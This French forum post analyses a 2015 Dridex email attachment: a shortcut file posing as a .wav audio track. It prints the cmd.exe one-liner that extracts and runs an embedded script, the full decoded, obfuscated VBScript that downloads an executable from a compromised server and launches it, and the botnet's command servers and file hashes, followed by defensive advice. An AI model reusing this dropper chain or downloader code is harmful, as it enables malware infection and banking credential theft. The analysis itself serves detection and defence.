Malekal, telle une locomotive, débarque sans crier gare. Fin de la digestion...
Un fichier louche provenant d'une pièce jointe de courriel malicieux semble l'inquiéter.
Nom fichier : "08439801260_20150725_150834.wav.lnk" - Poids: 4 127 octets.
Ce raccourci va tenter de se camoufler en utilisant une double extension, ce qui visuellement n'affichera que "08439801260_20150725_150834.wav" dans l'explorateur de fichiers. De plus, en utilisant la bibliothèque "%windir%\System32\wmploc.dll" du Lecteur Windows Media de Microsoft celui-ci va prendre l'apparence d'une piste audio en affichant l'icône d'un fichier multimédia.
Les arguments passés à l'interpréteur de commandes ( cmd.exe ) sont : /c copy *.wav.lnk %tmp%&%systemdrive%&cd %tmp%&for /F %i in ('dir /b /s *.wav.lnk') do set x=%i&findstr /R /C:"#@~" %x% >1.vbe&cscript 1.vbe
Il réalise une copie de lui-même à l'emplacement des fichiers temporaires, initialise la variable d'environnement "x" afin de stocker le chemin complet puis recherche à partir du marqueur ( chaine de caractères "#@~" ) la présence d'un VBE embarqué d'un poids de 2 637 octets ; extrait le contenu, un fichier script encodé en VBE ( VBScript Encoded Script File ) & l'exécute via Windows Script Host.
Afin d'analyser, je décode le VBE → VBS.
Code : Tout sélectionner
Public SbUYcGnIFn
Public Function xbxGk5Ux3irM4d()
cTdsOvmpZ0T = "h" & Chr(116) & "=" & Chr(116) & "p" & ":" & Chr(47) & Chr(59) & "/" & Chr(108) & Chr(97) & Chr(117) & Chr(114) & Chr(97) & "n" & Chr(99) & "e" & "-" & Chr(112) & Chr(114) & "i" & Chr(109) & Chr(101) & Chr(117) & Chr(114) & Chr(115) & Chr(61) & Chr(46) & Chr(102) & Chr(114) & Chr(47) & Chr(51) & Chr(52) & Chr(53) & Chr(47) & Chr(119) & Chr(114) & Chr(119) & Chr(46) & "=" & Chr(101) & Chr(60) & "x" & Chr(101)
Set ElDbasip6 = w7IAmB5cDGswAm("M" & Chr(105) & "c" & Chr(114) & Chr(111) & "<s" & "o" & Chr(102) & "t" & Chr(46) & Chr(88) & Chr(77) & Chr(60) & Chr(76) & Chr(72) & "T" & "<T;" & Chr(80))
cTdsOvmpZ0T = Replace(cTdsOvmpZ0T, Chr(60), "")
cTdsOvmpZ0T = Replace(cTdsOvmpZ0T, Chr(61), "")
cTdsOvmpZ0T = Replace(cTdsOvmpZ0T, Chr(59), "")
ElDbasip6.Open "G" & "E" & Chr(84), cTdsOvmpZ0T, False
Set HURaWTTfnV70aA = w7IAmB5cDGswAm(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & "t" & Chr(46) & Chr(83) & Chr(104) & Chr(101) & "l" & Chr(108))
Set jfhAqR8f0z = HURaWTTfnV70aA.Environment(Chr(80) & Chr(114) & Chr(111) & Chr(99) & Chr(101) & Chr(115) & Chr(115))
Ga9exV0usiOxh = jfhAqR8f0z("T" & Chr(69) & Chr(77) & Chr(80))
SbUYcGnIFn = Ga9exV0usiOxh & Chr(92) & Chr(109) & Chr(105) & Chr(107) & "a" & Chr(112) & Chr(111) & Chr(108) & Chr(110) & Chr(101) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
Dim FiiLlqz7ZuFikb
ElDbasip6.Send
FiiLlqz7ZuFikb = ElDbasip6.responseBody
T1AetFXr4ps8 FiiLlqz7ZuFikb, SbUYcGnIFn
CP45sZEhc107 ("avNTTxhUC9eWb")
End Function
Public Function w7IAmB5cDGswAm(Fpsh8W7KwFw4n3)
Fpsh8W7KwFw4n3 = Replace(Fpsh8W7KwFw4n3, Chr(60), "")
Fpsh8W7KwFw4n3 = Replace(Fpsh8W7KwFw4n3, Chr(61), "")
Fpsh8W7KwFw4n3 = Replace(Fpsh8W7KwFw4n3, Chr(59), "")
Set w7IAmB5cDGswAm = CreateObject(Fpsh8W7KwFw4n3)
End Function
Public Function T1AetFXr4ps8(PUDV4fRQQIpv, inq7dnGSyLG)
Dim pDvVXJLJ5VGIbM: Set pDvVXJLJ5VGIbM = w7IAmB5cDGswAm(Chr(65) & "d" & Chr(111) & "d" & Chr(98) & "." & Chr(83) & "t" & Chr(114) & Chr(101) & Chr(97) & Chr(109))
With pDvVXJLJ5VGIbM
.Type = 1
.Open
.write PUDV4fRQQIpv
.savetofile inq7dnGSyLG, 2
End With
End Function
Public Function CP45sZEhc107(oTOZyLSZ9iofhw)
Set YMg9p4gOLj = w7IAmB5cDGswAm("S" & "h" & "e" & "l" & "l" & Chr(46) & Chr(65) & Chr(112) & "p" & Chr(108) & "i" & Chr(99) & Chr(97) & Chr(116) & "i" & "o" & Chr(110))
YMg9p4gOLj.Open (SbUYcGnIFn)
End Function
xbxGk5Ux3irM4d()
J'ajoute un "WScript.Echo cTdsOvmpZ0T" pour break & l'afficher à l'écran.
"http://laurance-primeurs.fr/345/wrw.exe" ( 94.23.1.145 )
Le programme malveillant est hébergé sur un serveur compromis situé en France.
Une bonne semaine que NS365026.OVH.NET ( 94.23.1.145 ) se fait malmener.
MD5 :: 27E7A76A691DC562B30DA8D98014D686
SHA1 :: B395DA61BF31F664CFCE8A9BB67293396F8E414B
VirusTotal :: 66491A71B1D7A807D0B66205B3931BD297439678387DBC6FEC77DFE1D0419A32
File Description :: Autodesk Hardcopy componenent
File Version :: 10.2.48.0.0
Creation time :: 28:07:2015 - 13:59:56
Access time :: 28:07:2015 - 13:59:56
Modification Time :: 28:07:2015 - 10:24:25
CPU :: 32-bit
Size (bytes) :: 155648
Type :: Executable
SubSystem :: Windows GUI
Dridex CnC :: <config botnet="220">
<server_list>
93.171.132.5:743
194.58.96.45:4543
31.131.251.33:743
62.210.214.106:448
151.248.123.100:743
</server_list>
</config>
Finalement, le sage Malekal avait raison d'être méfiant. ( si avec ça je n'ai pas des goodies à la fin de l'année... )
C'est l'heure de radoter... les habituelles recommandations : informez-vous & configurez vos applications / appliances en conséquence pour renforcer la sécurité de vos installations. Puisque personne ne vous enverra de raccourcis, filtrez toutes les pièces jointes en amont, appliquez un blocage systématique sur ces extensions de fichiers.
Comme illustré l'année dernière, les raccourcis sont bien plus bavards qu'il n'y parait. ( lire L'affaire Hélène K. ). D'un côté c'est intrusif & de l'autre ces traces finissent parfois par trahir les attaquants du dimanche.
Si par mégarde vous avez ouvert un courriel piégé, n'attendez pas.
Souvent ces programmes dérobent vos identifiants & infos bancaires.
Venez vite faire vérifier l'état de santé de votre ordinateur sur le forum.
Pour toutes questions + techniques, contactez-moi via messages privés.
Liens connexes:
➱ ( July 30, 2015 ) ❴ Dridex tests new .lnk email attachments ❵
➱ ( August 6, 2015 ) ❴ La Gendarmerie française appelle à la vigilance face à Dridex ❵